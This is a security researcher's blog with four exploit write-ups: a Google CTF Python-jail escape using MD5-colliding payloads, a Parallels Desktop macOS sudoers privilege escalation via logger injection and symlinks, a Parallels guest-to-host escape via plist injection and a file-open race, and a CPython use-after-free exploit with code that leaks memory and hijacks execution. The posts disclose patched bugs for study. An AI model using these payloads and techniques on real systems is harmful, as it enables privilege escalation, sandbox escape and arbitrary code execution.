pwn.win

Escaping a Python jail using an MD5 collision

2024-06-27T00:00:00+00:00

I played Google CTF last weekend and there was a fun Python jail challenge, PyCalc.

Connecting to the provided host and port gives us a limited Python shell. We can evaluate basic arithmetic expressions, like so:

$~ ncat pycalc.2024.ctfcompetition.com 1337
== proof-of-work: disabled ==
Simple calculator in Python, type 'exit' to exit
> 1+1
Caching code validation result with key d96e018f51ea61e5ff2f9c349c5da67d
Waiting up to 10s for completion
2

Most other expressions failed to execute, with the program detailing which opcode was disallowed. For example, attempting an import or calling a function:

== proof-of-work: disabled ==
Simple calculator in Python, type 'exit' to exit
> import os
Caching code validation result with key ed9f4b8f879ddbb59fda1057ea3a2810
Instruction IMPORT_NAME is not allowed
Code validation failed
> exec()
Caching code validation result with key c501db5e49896515e6d0ad52c2283bc2
Instruction PRECALL is not allowed
Code validation failed

It was clear that there was a whitelist of permitted opcodes, and after searching for ways to execute arbitary code for a while, we couldn’t find a method which didn’t fail the validation.

One particular line of the output was interesting though:

Caching code validation result with key d96e018f51ea61e5ff2f9c349c5da67d

The hash looks like MD5, and it sounds like the code is verifying the bytecode and then caching the result using this MD5 digest as the cache key. It’s quickly apparent that this hash is simply the MD5 of our UTF-8 encoded input.

hashlib.md5('1+1'.encode('utf8')).hexdigest() == 'd96e018f51ea61e5ff2f9c349c5da67d'

With this thesis we devised our solution: submit innocuous code which doesn’t contain bad opcodes, which will be validated and then cached, then submit evil code which has the same MD5 hash, which contains bad opcodes and gets us a shell.

So how do we create two Python expressions with the same hash which do different things?

The idea is this: start both inputs with an open quote, ', then append arbitrary data to both such that the resulting strings have the same hash (i.e. create a collision), now add an identical suffix to both strings (which will preserve the collision) which switches control flow based on the random data within the strings, for example:

'baR3SMhZPUl6zaL24n'[0] == 'b' or breakpoint()
'NzdYAKsD8AKK3z+la4'[0] == 'b' or breakpoint()

In the case of the first string the left-hand side of the or will be truthy and thus the expression will yield True. In the case of the second string the left-hand side will be falsy and therefore we will invoke breakpoint(), which in Python is sufficient to execute arbitrary code interactively.

In practice it was slightly more difficult as we couldn’t use the equality operator, but we could use binary operators like &. We also couldn’t use the binary operators on a string index, as that would be operating on a string, but we could use them on integers. Therefore we could instead prefix both inputs with b' to create bytestrings which when indexed will give an integer. We could use these integers with binary operators to yield a truthy and falsy value.

You may wonder why the bad opcodes on the right-hand side of the or aren’t included in the compiled code regardless - this is because when this code is compiled into bytecode Python omits the right-hand side if the left-hand side can be evaluated to a truthy value at compile time. You can see that here:

>>> c = compile('1 or breakpoint()', '', 'eval')
>>> list(map(lambda x: x.opname, dis.get_instructions(c)))
['RESUME', 'LOAD_CONST', 'RETURN_VALUE']
>>> c = compile('0 or breakpoint()', '', 'eval')
>>> list(map(lambda x: x.opname, dis.get_instructions(c)))
['RESUME', 'PUSH_NULL', 'LOAD_NAME', 'CALL', 'RETURN_VALUE']

To generate the collision I used the textcoll.sh script from Marc Stevens’ HashClash. We modified the script slightly to increase the size of the alphabet, and remove the constraints on all but the first and second bytes (constraining them to b'). Generating this collision took around 30 minutes on a 128 core machine.

This resulted in two inputs:

# input1
b'cAWa,=tDo9lp4!tc&=A/-.mkq38p_lMEWWA{e6v!2Rk:nL|N?;5d%`3F+{3,~Dk/ddEV+5qN"UUlv5a)W$R2pF9Rm|,tiD4-kA;s$V%^>]fi`(FX=q!!!!!&!!TQg(

# input2
b'cAWa,=tDo9lp4!tc&=A3-.mkq38p_lMEWWA{e6v!2Rk:nL|N?;5d%`3F+{3,~Dk/ddEV+5qN"UUlv5a)W$R2pF9Rm|,tiD4-kA;s$V%^>]fi`(FX=q!!!!!&!!TQg(

Which we can see have the same MD5 hash:

$~ md5sum input*
102837a16831bc539fe06a9f21af30ad  input1
102837a16831bc539fe06a9f21af30ad  input2
$~ sha256sum input*
44ee9adeaf32bebda45eae0aa534a5574e209cd4f2b333005bbda638f3b76b2e  input1
dcaf5c2e1881d9b39c9190411dd000a52018043114c8196b4095867fdcf4a360  input2

Looking carefully we can see that 20th character in both bytestrings differs. In the first it is /, in the second it is 3, that means we can use this index to switch the control flow.

b'cAWa,=tDo9lp4!tc&=A/-.mkq38p_lMEWWA{e6v!2Rk:nL|N?;5d%`3F+{3,~Dk/ddEV+5qN"UUlv5a)W$R2pF9Rm|,tiD4-kA;s$V%^>]fi`(FX=q!!!!!&!!TQg(
                     ^
                     |--- 20th character of bytestring differs
                     v
b'cAWa,=tDo9lp4!tc&=A3-.mkq38p_lMEWWA{e6v!2Rk:nL|N?;5d%`3F+{3,~Dk/ddEV+5qN"UUlv5a)W$R2pF9Rm|,tiD4-kA;s$V%^>]fi`(FX=q!!!!!&!!TQg(

Anding these characters with 4 results in a truthy value and a falsy value, which is exactly what we need.

>>> input1[19] & 4
4
>>> input2[19] & 4
0

This gives us a common suffix which we can append to both payloads:

'[19] & 4 or breakpoint()

Now our final inputs look like this:

b'cAWa,=tDo9lp4!tc&=A/-.mkq38p_lMEWWA{e6v!2Rk:nL|N?;5d%`3F+{3,~Dk/ddEV+5qN"UUlv5a)W$R2pF9Rm|,tiD4-kA;s$V%^>]fi`(FX=q!!!!!&!!TQg('[19] & 4 or breakpoint()
b'cAWa,=tDo9lp4!tc&=A3-.mkq38p_lMEWWA{e6v!2Rk:nL|N?;5d%`3F+{3,~Dk/ddEV+5qN"UUlv5a)W$R2pF9Rm|,tiD4-kA;s$V%^>]fi`(FX=q!!!!!&!!TQg('[19] & 4 or breakpoint()

Submitting the benign input followed by the evil input invokes breakpoint() and we can use the Python debugger to drop us into a shell, like so:

$~ ncat pycalc.2024.ctfcompetition.com 1337
== proof-of-work: disabled ==
Simple calculator in Python, type 'exit' to exit
> b'cAWa,=tDo9lp4!tc&=A/-.mkq38p_lMEWWA{e6v!2Rk:nL|N?;5d%`3F+{3,~Dk/ddEV+5qN"UUlv5a)W$R2pF9Rm|,tiD4-kA;s$V%^>]fi`(FX=q!!!!!&!!TQg('[19] & 4 or breakpoint()
Caching code validation result with key 6418545ef8b9b1daa3b5fe41d46c2cc6
Waiting up to 10s for completion
4
> b'cAWa,=tDo9lp4!tc&=A3-.mkq38p_lMEWWA{e6v!2Rk:nL|N?;5d%`3F+{3,~Dk/ddEV+5qN"UUlv5a)W$R2pF9Rm|,tiD4-kA;s$V%^>]fi`(FX=q!!!!!&!!TQg('[19] & 4 or breakpoint()
Hit code validation result cache with key 6418545ef8b9b1daa3b5fe41d46c2cc6
Waiting up to 10s for completion
--Return--
> (1)()->None
(Pdb) import os; os.system('/bin/bash')
whoami
ubuntu
/readflag
CTF{Ca$4_f0r_d3_C4cH3_Ha5hC1a5h}

Turning a boring file move into a privilege escalation on Mac

2023-10-28T00:00:00+00:00

While poking around Parallels Desktop I found a script which is invoked by a setuid-root binary, which has the following snippet:

local prl_dir="${usr_home}/Library/Parallels"
if [ -e "$prl_dir" -a ! -d "$prl_dir" ]; then
  log warning "'${prl_dir}' is not a directory. Renaming it."
  mv -f "$prl_dir"{,~}
  continue
fi

Here ${usr_home} represents the home directory of the user for which Parallels Desktop is installed. The code says if ~/Library/Parallels exists and is not a directory then move it to ~/Library/Parallels~, presumably to back it up before creating this path as a directory.

However, given this is our home directory, we (a low privileged user) can create ~/Library/Parallels~ beforehand, and make it a symlink to another directory, for example. This would mean the code actually moves ~/Library/Parallels into the directory pointed to by the symlink. Additionally, we can fully control the ~/Library/Parallels file, it can have whatever content we want, or it could even be a symlink to some other file.

Great, so now we can move a file of controlled content, or a symlink, into an arbitrary directory. How can we use this to escalate our privileges to root?

Digging around the filesystem, some ways which came to mind:

/etc/periodic/{daily,monthly,weekly}
- Files must be owned by root, which our file isn’t
- Besides, I don’t want to wait days for this privesc
/etc/pam.d/
- Files must be owned by root, which our file isn’t
- Filenames are important, we can’t use the Parallels filename for this
/etc/ssh/sshd_config.d/
- Could use something like AuthorizedKeysCommand and AuthorizedKeysCommandUser to execute a command as root
- Would need a reboot or some other way to force sshd to reload its config
- sshd would need to be running in the first place, which it’s not by default
/etc/sudoers.d/
- Files must be owned by root, which our file isn’t
- Files must not be world writeable

Of these, the hurdles which seemed easiest to overcome were those of /etc/sudoers.d. So I started digging for files which are owned by root, are not world-writeable, and we can partially control. With some searching I found /var/log/install.log.

-rw-r--r--@ 1 root  admin  637109 23 Jun 12:00 /var/log/install.log

It turns out we can write to this log using the logger utility, specifying the install.error priority. Like so:

logger -p install.error "Hello, World!"

Even better, we can get our content onto a new line using a carriage return, which is replaced with a newline, like so:

logger -p install.error $(echo -e "\rHello, World!")

We can use this to insert a line of sudo config:

logger -p install.error $(echo -e "\r$USER ALL=(ALL) NOPASSWD: ALL")

So now we have a log file with a bunch of invalid sudo config lines (i.e. normal log entries), with one line of valid sudo config, which says that our current user can use sudo with no password, allowing us to escalate our privileges.

Now we can make ~/Library/Parallels a symlink pointing to /var/log/install.log and ~/Library/Parallels~ a symlink pointing to /etc/sudoers.d/. When we invoke the vulnerable script, which runs as root, it will move our symlink, pointing to the log file, into /etc/sudoers.d/.

After that we can run sudo su, which will follow the symlink, parse the log file, spitting out pages of errors about the invalid syntax of the log entries in the process (but kindly continuing processing) until it reaches a line of valid syntax which we’ve injected, and eventually we’ll be dropped into a root shell.

Hopefully other people find this trick useful, beyond just Parallels. You can find the code for this exploit on my GitHub.

Timeline

2023-05-19 - ZDI submission, assigned ZDI-CAN-21227
2023-06-21 - reported to vendor
2023-07-06 - fix released in version 18.3.2
2023-12-19 - public release of advisory, CVE-2023-50226

Escaping Parallels Desktop with Plist Injection

2023-05-08T00:00:00+00:00

This post details two bugs I found, a plist injection (CVE-2023-27328) and a race condition (CVE-2023-27327), which could be used to escape from a guest Parallels Desktop virtual machine. In this post I’ll break down the findings.

For anyone not familiar, Parallels Desktop offers virtualization on macOS. It allows you to run virtual machines, like Windows or Linux, on a macOS host.

Toolgate & Parallels Tools

Toolgate is the protocol used for communication between the guest and host in Parallels, and it’s a great place to start looking for bugs due to its large attack surface and relatively immature security posture.

On x86 guests (which I’ll be using as an example for this blog post) Toolgate requests are sent to the host from the guest by writing the physical address of a TG_REQUEST struct to a specific I/O port.

A request structure consists of an opcode (Request), a status field (Status) which is updated by the host to indicate the status of a request, optional inline data (if InlineByteCount > 0), and an optional list of TG_BUFFER structs (if BufferCount > 0).

typedef struct _TG_REQUEST {
  unsigned Request;               // opcode
  unsigned Status;                // request status
  unsigned short InlineByteCount; // number of inline bytes
  unsigned short BufferCount;     // number of buffers
  unsigned Reserved;              // reserved
  /* [ inline bytes ] */
  /* [  TG_BUFFERs  ] */
} TG_REQUEST;

Parallels Tools is software which can be installed in a guest (similar to VirtualBox Guest Additions, or VMWare Tools) which adds various useful features, such as shared folders, shared clipboard, and drag-and-drop in/out of the VM.

Parallels Tools also adds a channel for userland processes to make Toolgate requests. On Linux this is a proc entry created at /proc/driver/prl_tg, which is created and managed by the prl_tg kernel module, and on Windows this is a named pipe at \\.\pipe\parallels_tools_pipe. Parallels Tools also contains various userland processes and services which use this channel to facilitate these useful features.

Importantly there is a restriction on what Toolgate messages userland processes can send to the host using the channel created by Parallels Tools, which is enforced by the prl_tg kernel module. Specifically, the opcode (aka the Request field) must be greater than the value of TG_REQUEST_SECURED_MAX, which is defined as 0x7fff, otherwise the write to the proc entry will fail with EINVAL. We can see the code for this here:

	/* read request header from userspace */
	if (copy_from_user(src, ureq, sizeof(TG_REQUEST)))
		return -EFAULT;

	/*
	 * requests up to TG_REQUEST_SECURED_MAX are for drivers only and are
	 * denied by guest driver if come from user space to maintain guest
	 * kernel integrity (prevent malicious code from sending FS requests)
	 * dynamically assigned requests start from TG_REQUEST_MIN_DYNAMIC
	 */
	if (src->Request <= TG_REQUEST_SECURED_MAX)
		return -EINVAL;

As suggested by the comment, the only Toolgate opcodes which are less than this threshold are those which handle filesystem operations. This means that if we want to send filesystem-related Toolgate requests, we have to bypass this check. More on this later.

Shared Applications

Shared Applications is a Parallels feature which allows opening files on a Mac in a guest application, and vice versa. It also allows associating file extensions and URL schemes with guest applications. You can read more about this in the documentation.

This feature includes the display of an application’s icon in the Mac dock when it’s launched within a guest. Here’s an example of what it looks like when Microsoft Edge is opened in a Windows guest. We can see that the Edge icon shows up in the dock:

Parallels handles the “syncing” of running guest apps to the host by monitoring for new applications launched in the guest, and then sending Toolgate requests to the host when a new application has started. The host handles these messages by creating and starting “helper” apps, which have the same name and icon as the app in the guest. These helper apps are then displayed in the Mac dock when they are running, and can be used to launch the respective application in the guest from the dock or Launchpad when they are not running.

This syncing process effectively works like this:

Parallels Tools detects an application is launched in the guest
It sends a Toolgate request (TG_REQUEST_FAVRUNAPPS, opcode 0x8302) to the host notifying it that an application has launched with a given name and icon
If a helper app already exists for this guest app, then that helper app is launched and we’re done
If the helper app doesn’t exist, a new app bundle is created in ~/Applications (Parallels)/ Applications.localized/
The app bundle is created from a template, which is filled in using information supplied by the guest. The information sent from the guest, as part of the Toolgate request, includes the app name, description and icon, amongst other things. This information is written into several files in the new app bundle, including the Info.plist, which is the (XML) file in an app bundle which includes metadata about the bundle
The new helper app is launched, so it shows up in the dock

The helper app contains a binary called WinAppHelper, which is copied directly from the template and exists as the entry point for the app bundle. When the app is run this binary will parse the Parallels-specific configuration files in the app bundle (e.g. AppParams.pva) and send a message to the corresponding guest VM to start the relevant application, if it’s not already running.

Here you can see a snippet of the Info.plist template, which is taken from the hypervisor binary. The highlighted placeholders are replaced with guest supplied input.

Given that the host is taking input from the guest and using it to fill an Info.plist template, it is important that all input from the guest is appropriately escaped or sanitized, so it is not possible to inject XML into the plist and modify the behaviour of the helper app. I found that the escaping was done for all of the fields provided by the guest, apart from two, the URL schemes and the file extensions. These allow registering file extensions and URL schemes which the guest app will handle, respectively.

This means we could send our own Toolgate request (opcode 0x8302), to tell the host to create a helper app, with a malicious URL scheme or file extension. In my case I chose to exploit the URL schemes, which were written unescaped into the CFBundleURLSchemes array, in Info.plist.

The relevant template for creating the CFBundleURLSchemes array looks like this:

CFBundleURLTypes

    CFBundleURLName
    Supported protocols
    CFBundleURLSchemes
    
    %1

The %1 is replaced with the guest-provided URL schemes, each wrapped in tags. The completed template is then inserted into the Info.plist template later on.

This is what it looks like in code form:

One way this can be abused is by using the LSEnvironment key to set the DYLD_INSERT_LIBRARIES environment variable. This can be used to force the helper binary (WinAppHelper) to load an arbitrary dylib when executed. I did spend a while looking for other features of an Info.plist which I could exploit without requiring a second bug, but I wasn’t able to find anything better. I’d be very keen to hear any alternative ideas for exploitation.

For example, if we provide the following string as a URL scheme:

      evil
    
LSEnvironment

  DYLD_INSERT_LIBRARIES
  /path/to/malicious.dylib

blabla

This gets wrapped in tags and inserted into the template, resulting in something like this:

CFBundleURLTypes

    CFBundleURLName
    Supported protocols
    CFBundleURLSchemes
    
      evil
    
LSEnvironment

  DYLD_INSERT_LIBRARIES
  /path/to/malicious.dylib

blabla

Now when WinAppHelper is executed it will load a dylib of our choice. If we can make use of an existing dylib which does something interesting, or create our own dylib on disk somewhere, then we can use this to get code execution on the host.

Getting a File Write

To complete the goal of code execution on the host with no user interaction, I needed to find a way to write a controlled dylib to a known location on the host. Unfortunately there were no files in the helper app bundle which I controlled in their entirety (including e.g. the app icon). Shared folders seemed like a good place to look for bugs which could allow us to do this.

Shared folders in Parallels are actually implemented using Toolgate, which has opcodes for all aspects of file management, including opening, reading and writing files. The shared folder filesystem kernel module (prl_fs), writes the relevant Toolgate instructions to the host when filesystem operations occur in the guest, and the host then performs the requested operation.

As mentioned earlier, all of these opcodes are forbidden by the communication channel created by Parallels Tools, which means to send filesystem-related opcodes we need to load our own kernel module to do this, which unfortunately requires root permissions. To do this I took the existing prl_tg code and made some modifications to remove the security checks.

Once we can write arbitrary messages to Toolgate, we can open files in a shared folder using the TG_REQUEST_FS_L_OPEN (0x223) opcode. In the hypervisor, file paths are constructed by appending the file path provided by the guest to the configured shared folder path on the host. There are some security checks when handling an open request to make sure the guest can’t open files outside of the host shared folder path, including:

Checking if the file path contains .., which should have already been canonicalized by the guest
Checking if the file is a symlink which points outside of the share
Opening the constructed path and checking if the resulting file is outside of the shared folder on the host, which is done using the F_GETPATH option of fcntl.

If any of these checks fail then Parallels will refuse to open the file and will return an error to the guest. The checks themselves look good, but the issue was a time-of-check to time-of-use (TOCTOU) opportunity between when the security checks happened and when the file was actually opened. This meant that if we quickly switched the path from a normal file to a symlink pointing to a path outside of the share on the host, after the security checks, but before the open, then the hypervisor would open the target of the symlink on the host for us. After that we could simply read from or write to the opened file using subsequent calls to Toolgate. In other words, this gives us the ability to read or write any file on the host, assuming the host process has permissions.

Ok, but why do we need Toolgate requests for this, if the shared folders filesystem does it for us? In theory this bug should be exploitable by just performing the race with files in a shared folder, without sending manual Toolgate requests. However, in practice, trying to exploit this race through only filesystem operations triggers a bug in the prl_fs kernel module which results in a kernel oops.

Combining the two

The first bug allows us to load any dylib on the host, and the second bug gives us the ability to write an arbitrary file anywhere on the host filesystem (assuming the Parallels process has permissions). Therefore we can create a malicious dylib, write it to a known location on the host, and force a helper app to load it, which will give us code execution with no user interaction.

We can use the following code compiled into a dylib, which will pop a calculator when the dylib is loaded.

#include 

void __attribute__ ((constructor)) pwn() {
    unsetenv("DYLD_INSERT_LIBRARIES");
    system("osascript -e 'tell application \"Calculator.app\" to activate'");
}

Exploit Demonstration

Conclusion

This chain can be exploited from within any guest operating system by any code with elevated privileges, which are necessary to use the privileged instructions needed to write arbitrary Toolgate requests. If Parallels Tools is installed, then the plist injection bug can be exploited with low privileges, but the file write bug still requires loading our own kernel module to bypass the security restrictions and send our own filesystem-related Toolgate requests.

Overall, Parallels is a fun target. Based on the bugs I and others have found I would say that it’s more immature than the likes of VirtualBox and VMWare, and I’m sure there are plenty more bugs to be found here.

You can find the code for these exploits on my GitHub.

Timeline

Plist injection
- Assigned CVE-2023-27328 / ZDI-23-220
- 2022-11-03 - reported to vendor
- 2022-12-13 - fix released in version 18.1.1
- 2023-03-07 - public release of advisory
File open TOCTOU
- Assigned CVE-2023-27327 / ZDI-23-215
- 2022-11-03 - reported to vendor
- 2022-12-13 - fix released in version 18.1.1
- 2023-03-07 - public release of advisory

Exploiting a Use-After-Free for code execution in every version of Python 3

2022-05-11T00:00:00+00:00

A while ago I was browsing the Python bug tracker, and I stumbled upon this bug - “memoryview to freed memory can cause segfault”. It was created in 2012, originally present in Python 2.7, but remains open to this day, 10 years later. This piqued my interest, so I decided to take a closer look.

What follows is a breakdown of the root cause and how I wrote a reliable exploit which works in every version of Python 3.

Python Objects

To understand anything happening in CPython it’s important to have an understanding of how objects are represented internally. I’ll give a brief introduction here, but there are several (better) resources on the internet for learning about this.

Everything in Python is an object. CPython represents these objects with the PyObject struct. Every type of object extends the basic PyObject struct with their own specific fields. A PyObject looks like this:

typedef struct _object {
    Py_ssize_t ob_refcnt;
    PyTypeObject *ob_type;
} PyObject;

A list, for example, is represented by a PyListObject, which looks roughly like this:

typedef struct {
    PyObject ob_base;
    Py_ssize_t ob_size;
    PyObject **ob_item;
    Py_ssize_t allocated;
} PyListObject;

We can see that every object has a refcount (ob_refcnt) and a pointer to its corresponding type object (ob_type), in ob_base. The type object is a singleton and there exists one for every type in the Python language. For example, an int will point to PyLong_Type, and a list will be point to PyList_Type.

With that out of the way, let’s look at the PoC.

Proof of Concept

The author of the bug report kindly included a proof of concept which will trigger a null pointer dereference. You can see that here:

import io

class File(io.RawIOBase):
    def readinto(self, buf):
        global view
        view = buf
    def readable(self):
        return True
    
f = io.BufferedReader(File())
f.read(1)                       # get view of buffer used by BufferedReader
del f                           # deallocate buffer
view = view.cast('P')
L = [None] * len(view)          # create list whose array has same size
                                # (this will probably coincide with view)
view[0] = 0                     # overwrite first item with NULL
print(L[0])                     # segfault: dereferencing NULL

Root Cause

The comments in the PoC provide some indication as to what is going on, but I’ll try to break it down further.

This bug is a fairly typical use-after-free, but to understand it we must first understand what io.BufferedReader does. The documentation does a good job of explaining it:

A buffered binary stream providing higher-level access to a readable, non seekable RawIOBase raw binary stream. It inherits BufferedIOBase.

When reading data from [the BufferedReader], a larger amount of data may be requested from the underlying raw stream, and kept in an internal buffer. The buffered data can then be returned directly on subsequent reads.

In the proof of concept we first define a class called File, which inherits from io.RawIOBase, and define some methods on it. We then create a BufferedReader object, specifying an instance of the custom File class as the underlying raw stream.

When the BufferedReader is initialized it allocates an internal buffer. When we read from the buffered reader (line 11) and the data doesn’t exist in its internal buffer, it will read from the underlying stream. The read from the underlying stream happens via the readinto function, which receives a buffer as an argument, which the raw stream is supposed to read data into. The buffer passed as an argument is actually a memoryview which is backed by the BufferedReader’s internal buffer. You can think of the memoryview as a pointer to, or a view of, the internal buffer.

Given that we control the underlying stream object, we can make the readinto function save a reference to this memoryview argument, which will persist even once we’ve returned from the function, which is exactly what the PoC does on line 6.

Once we have saved a reference to the memoryview we can delete the BufferedReader object. This will force the internal buffer to be freed, even though we still have a reference to our friendly memoryview, which is now pointing to a freed buffer.

Exploitation

Now we have a memoryview pointing to freed heap memory, which we can read from or write to, where do we go from here?

The easiest approach for exploitation is to create a list with length equal to the length of the freed buffer, which will very likely have its item buffer (ob_item) allocated in the same place as the freed buffer. This will mean we get two different “views” on the same piece of memory. One view, the memoryview, thinks that the memory is just an array of bytes, which we can write to or read from arbitarily. The second view is the list we created, which thinks that the memory is a list of PyObject pointers. This means we can create fake PyObjects somewhere in memory, write their addresses into the list by writing to the memoryview, and then access them by indexing into the list.

In the case of the PoC, they write 0 to the buffer (line 16), and then access it with print(L[0]). L[0] gets the first PyObject* which is 0 and then print tries to access some fields on it, resulting in a null pointer dereference.

Given that this bug is present on every version of Python since at least Python 2.7, I wanted my exploit to work on as many versions of Python 3 as I could, just for fun. I decided against writing it for Python 2 because there are some differences in the languages which I didn’t want to account for in my exploit, but it’s absolutely possible to tweak my code to get this to work there. This meant that I couldn’t rely on any hardcoded offsets into the CPython binary, or into libc. Instead I chose to use known struct offsets (which haven’t changed between Python versions), some manual ELF parsing, and some known linker behaviour, to get a reliable exploit.

The goal of the exploit is to call system("/bin/sh"). The steps of which are as follows:

Leak CPython binary function pointer
Calculate the base address of CPython
Calculate the address of system or its PLT stub
Jump to this address with the first argument pointing to /bin/sh
Win

Getting a leak

Leaking arbitrary amounts of data from an arbitrary location turned out to be pretty easy. We can use a specially crafted bytearray object. The layout of a bytearray looks like this:

typedef struct {
    PyObject_VAR_HEAD
    Py_ssize_t ob_alloc;   /* How many bytes allocated in ob_bytes */
    char *ob_bytes;        /* Physical backing buffer */
    char *ob_start;        /* Logical start inside ob_bytes */
    Py_ssize_t ob_exports; /* How many buffer exports */
} PyByteArrayObject;

ob_bytes is a pointer to a heap-allocated buffer. When we read from or write to the bytearray, we’re reading/writing to this heap buffer. If we can craft a fake bytearray object, and we can set ob_bytes to point to an arbitrary address, then we can read or write to this arbitrary address by reading or writing to this bytearray.

Crafting fake objects is made very easy by CPython. If you create a bytes object (this is not the same thing as a bytearray), the raw data within the bytes object is always present 32 bytes after the start of the PyBytesObject, in one contiguous chunk. We can get the address of the PyBytesObject with the id function, and we know the offset to our data, so we can do something like this:

fake = b''.join([
        b'AAAAAAAA',    # refcount
        b'BBBBBBBB',    # type object pointer
        b'CCCC'         # other object data...
    ])
address_of_fake_object = id(fake) + 32

Now address_of_fake_object will be the address of AAAAAAAABBBBBBBBCCCC....

The final leak primative is shown below. Note that self.freed_buffer is the memoryview pointing to the freed heap buffer, and self.fake_objs is the list we created whose item buffer also points to the freed heap buffer.

def _create_fake_byte_array(self, addr, size):
    byte_array_obj = flat(
        p64(10),            # refcount
        p64(id(bytearray)), # type obj
        p64(size),          # ob_size
        p64(size),          # ob_alloc
        p64(addr),          # ob_bytes
        p64(addr),          # ob_start
        p64(0x0),           # ob_exports
    )
    self.no_gc.append(byte_array_obj) # stop gc from freeing after we return
    self.freed_buffer[0] = id(byte_array_obj) + 32

def leak(self, addr, length):
    self._create_fake_byte_array(addr, length)
    return self.fake_objs[0][0:length]

Finding the base of cpython

Now we have a leak primitive we can use it to find the base address of the binary. For this we need a function pointer into the binary. One object which hasn’t obviously changed in any version of Python 3, and has a function pointer into the CPython binary, is the PyLong_Type object. I chose to use the tp_dealloc member, at offset 24, which points to the type_dealloc function at runtime, but I could have just as easily chose another pointer in the same object, or in another object entirely.

Once we have a pointer into the binary, we can round it down to the nearest page and then walk backwards one page at a time until we find the ELF header. This works because we know that the binary will be mapped at a page aligned address.

All of this looks like:

def find_bin_base(self):
    # Leak tp_dealloc pointer of PyLong_Type which points into the Python
    # binary.
    leak = self.leak(id(int), 32)
    cpython_binary_ptr = u64(leak[24:32])
    addr = (cpython_binary_ptr >> 12) << 12  # page align the address
    # Work backwards in pages until we find the start of the binary
    for i in range(10000):
        nxt = self.leak(addr, 4)
        if nxt == b'\x7fELF':
            return addr
        addr -= PAGE_SIZE
    return None

Instruction pointer control

Recall that every PyObject has a pointer to its type object, e.g. a PyLongObject has a pointer to PyLong_Type, and a PyListObject has a pointer to PyList_Type. Every type object effectively functions as a vtable (amongst other things), which means there are lots of nice function pointers there. With this information its clear that if we can fake a PyObject and point it to a fake type object, and cause one of the vtable functions to be called, we can get control of the instruction pointer.

This is easy to set up with the aforementioned trick for creating fake objects, and we can trigger the tp_getattro function pointer by attempting to access a field on the fake object.

def set_rip(self, addr, obj_refcount=0x10):
    """Set rip by using a fake object and associated type object."""
    # Fake type object
    type_obj = flat(
        p64(0xac1dc0de),    # refcount
        b'X'*0x68,          # padding
        p64(addr)*100,      # vtable funcs 
    )
    self.no_gc.append(type_obj)

    # Fake PyObject
    data = flat(
        p64(obj_refcount),  # refcount
        p64(id(type_obj)),  # pointer to fake type object
    )
    self.no_gc.append(data)

    # The bytes data starts at offset 32 in the object 
    self.freed_buffer[0] = id(data) + 32

    try:
        # Now we trigger it. This calls tp_getattro on our fake type object
        self.fake_objs[0].trigger
    except:
        # Avoid messy error output when we exit our shell
        pass

I provide a way to set the refcount of the fake object because when calling a function from the vtable, the first argument to the function is a pointer to the object itself, and if the vtable function is actually system, then the the first bytes of the object are going to be interpreted as the command to execute. Therefore when creating the fake object for calling system, we can set the refcount to /bin/sh\x00.

Locating system

All versions of Python import system from libc. So, assuming Python is dynamically linked, we know that there’ll be an entry in the PLT for system, we just need to work out the address of this entry to be able to call it. Fortunately we can work this out through some parsing of the ELF structures.

The steps to do this are as follows:

Use our arbitrary leak to leak the ELF headers
Parse the program headers looking for the header of type PT_DYNAMIC. This will give us the address of the .dynamic section
Parse the .dynamic section, extracting the DT_JMPREL, DT_SYMTAB, DT_STRTAB, DT_PLTGOT and DT_INIT values, which give us the addresses of the various structures we need
Walk the relocation table, for each item get the offset into the symbol table, and use that to get the offset into the string table which gives the corresponding function name
Keep walking the relocation table until we find the entry corresponding to system.

The key piece of information that we want to know from this is the index in the relocation table of the system symbol. The linker is kind enough to place GOT and PLT entries in the same order as they exist in the relocation table, which means that once we have the index of the system entry we can work out its address in the GOT and the address of its PLT stub.

Full RELRO

If the binary is full RELRO then we know that all of the function addresses have already been resolved, this means that we can just read the system address from the GOT using our arbitary leak.

system_addr = got_address + system_idx*8

got_address conveniently comes from the DT_PLTGOT entry in the .dynamic section, and system_idx is what we just worked out by walking the relocation table.

We can determine whether the binary is full RELRO or not by reading the 2nd and 3rd entries in the GOT, which would normally be the address of the linkmap and dl_runtime_resolve, respectively. If they are both 0 then we can assume the binary is full RELRO, because the loader doesn’t waste its time setting up the resolution pointers/code in the PLT if nothing needs resolving at runtime.

Partial / No RELRO

If the binary is partial or no RELRO then the address of system needs to be resolved at runtime. For us this just means we will jump to the relevant PLT stub which will do the resolution and then call the function, instead of reading the function address from the GOT and calling it ourselves.

We can work out the address of the PLT stub like this:

system_plt = plt_address + system_idx*SIZEOF_PLT_STUB

SIZEOF_PLT_STUB is always 16 bytes, which means the only remaining unknown in this equation is the PLT address. As far as I could tell there’s no structure in an ELF which stores the address of this, which means we have to use some trickery to find it. Fortunately all of the linkers I encountered always place the PLT directly after the .init section, the address of which we know from the DT_INIT entry in the .dynamic section. We also know that on x86-64 the first instruction in the PLT is always of the form push qword ptr [rip + offset], the opcode for which is ff35. So we can search past the end of the .init section for the ff35 bytes, and wherever we find them is presumably the start of the PLT.

init_data = self.leak(init, 64)
plt_offset = None
for i in range(0, len(init_data), 2):
    if init_data[i:i+2] == b'\xff\x35':  # push [rip+offset]
        plt_offset = i
        break

If you want to follow along with the specifics of the parsing then I suggest reading the ELF man page and Wikipedia article, which have more information on the structures involved.

Finished Product

Putting all of these pieces together gives us a 100% reliable exploit which works in every version of Python 3 on x86-64 Ubuntu, even with PIE, full RELRO, and CET enabled, and it requires no imports. Trying it out on Ubuntu 22.04 gives:

You can find the full source of the exploit on my GitHub - https://github.com/kn32/python-buffered-reader-exploit/blob/master/exploit.py.

So what?

What’s the point of this whole thing, can’t you just do os.system(...)? Well, yes.

Given that you need to be able to execute arbitary Python code in the first place, this exploit won’t be useful in most settings. However, it may be useful in Python interpreters which are attempting to sandbox your code, through restricting imports or use of Audit Hooks, for example. This exploit doesn’t use any imports and doesn’t create any code objects, which will fire import and code.__new__ hooks, respectively. My exploit will only trigger a builtin.__id__ hook event, which is much more likely to be permitted.